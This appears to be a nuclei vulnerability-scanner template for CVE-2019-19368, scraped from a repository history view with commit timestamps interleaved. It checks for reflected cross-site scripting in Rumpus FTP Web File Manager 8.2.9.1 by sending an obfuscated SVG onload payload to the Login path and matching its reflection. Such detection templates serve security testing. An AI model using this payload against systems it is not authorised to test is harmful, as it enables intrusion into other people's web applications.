nuclei-templates/cves/CVE-2019-19368.yaml

21 lines
405 B
YAML
Raw Normal View History

id: cve-2019-19368
2020-04-08 13:05:45 +00:00
info:
name: Rumpus FTP Web File Manager 8.2.9.1 XSS
author: madrobot
2020-05-25 07:49:06 +00:00
severity: medium
2020-04-08 13:05:45 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"
matchers-condition: and
2020-04-08 13:05:45 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
2020-04-08 13:20:31 +00:00
- type: word
2020-04-08 13:24:48 +00:00
words:
2020-05-25 07:49:06 +00:00
- "value=''><sVg/OnLoAD=alert`1337`//'>"
2020-04-08 13:05:45 +00:00
part: body